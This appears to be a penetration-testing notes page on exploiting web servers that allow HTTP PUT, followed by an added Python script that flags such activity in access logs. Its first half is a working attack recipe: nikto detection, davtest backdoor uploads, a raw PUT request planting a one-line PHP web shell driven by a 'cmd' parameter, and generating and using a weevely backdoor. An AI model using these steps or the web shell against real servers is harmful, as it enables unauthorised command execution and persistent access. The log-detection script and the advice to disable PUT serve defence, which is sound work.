Detection of vulnerability
nikto --host <target ip>:<target port>
If it returns
+ OSVDB-397: HTTP method 'PUT' allows clients to save files on the web server.
You are potentially in business.
Some options for exploitation:
Try to get a backdoor with davtest
davtest -url http://<target ip>:<target port> -sendbd auto -cleanup
This will test all possible payloads it has, send backdoors and clean up after itself afterwards.
Try a basic php backdoor with Burp
Capture a request and send it to Repeater. Change the method to PUT and add some PHP code to the bottom of the request (Repeater updates the Content-Length header to match the body by default). It should look roughly like this:
PUT /test.php HTTP/1.1
Host: <target ip>:<target port>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
If-Modified-Since: Fri, 17 Feb 2017 22:27:30 GMT
If-None-Match: "18518f6-5a9-548c16b5e72ae"
Cache-Control: max-age=0
Content-Length: 50

<?php echo exec($_GET[cmd]); ?>
Once this is up, navigate to the page and try to run commands like so:
http://<target ip>:<target port>/test.php?cmd=whoami
Create a backdoor with weevely and upload it with Poster
Start by installing the Poster add-on for Firefox.
Next, spawn a backdoor with weevely:
weevely generate evil /root/back.php
This will output back.php with the password evil.
Go ahead and upload this shell using the PUT method with Poster by setting the following fields:
URL: http://<target ip>:<target port>/back.php
File: <location of back.php>
and then clicking the PUT button.
Now access the backdoor like so:
weevely http://<target ip>:<target port>/back.php evil
Once you're done, delete the backdoor using the DELETE method with Poster (select DELETE in the dropdown and click the green button). Alternatively, since you will probably have a shell on the system by this point, you can simply rm it from there.
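From the defender's side, everything above leaves a clear trail in the web server's access log: a PUT that creates a server-side script, a GET to that same path carrying a cmd parameter, and later a DELETE. The following detection script is an added example, not part of the original page; the log lines are constructed in Apache combined format, and the cmd parameter name and script extensions are assumptions taken from the examples above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines in Apache combined format (not taken from the page).
SAMPLE_LOG = """\
10.0.0.5 - - [17/Feb/2017:22:30:01 +0000] "GET /index.html HTTP/1.1" 200 1431 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Feb/2017:22:31:10 +0000] "PUT /test.php HTTP/1.1" 201 0 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Feb/2017:22:31:15 +0000] "GET /test.php?cmd=whoami HTTP/1.1" 200 12 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Feb/2017:22:32:02 +0000] "PUT /back.php HTTP/1.1" 403 199 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Feb/2017:22:40:00 +0000] "DELETE /test.php HTTP/1.1" 204 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SCRIPT_EXT = (".php", ".phtml", ".jsp", ".asp", ".aspx")  # script types a PUT should never create
CMD_PARAMS = {"cmd"}  # parameter used by the one-liner shell on the page (assumed; extend as needed)


def find_put_alerts(log_text):
    """Return (kind, ip, path) tuples for PUT/DELETE activity and use of a PUT-uploaded script."""
    alerts = []
    uploaded = set()  # paths where a PUT succeeded (2xx) earlier in the log
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a production pipeline would count these
        method, status = m["method"], int(m["status"])
        url = urlsplit(m["target"])
        path = url.path
        if method in ("PUT", "DELETE"):
            success = 200 <= status < 300
            if method == "PUT" and path.lower().endswith(SCRIPT_EXT):
                kind = "script_upload" if success else "script_upload_attempt"
                if success:
                    uploaded.add(path)
            else:
                kind = f"{method.lower()}_{'ok' if success else 'denied'}"
            alerts.append((kind, m["ip"], path))
        elif method == "GET" and path in uploaded:
            params = parse_qs(url.query)
            if any(p in params for p in CMD_PARAMS):
                alerts.append(("webshell_command", m["ip"], path))
    return alerts


if __name__ == "__main__":
    for kind, ip, path in find_put_alerts(SAMPLE_LOG):
        print(f"{kind:22} {ip:12} {path}")
```

Any "script_upload" hit means the server accepted a PUT it should have refused; the fix is to disable PUT and DELETE (or restrict them to authenticated WebDAV paths) in the web server configuration rather than to rely on the log.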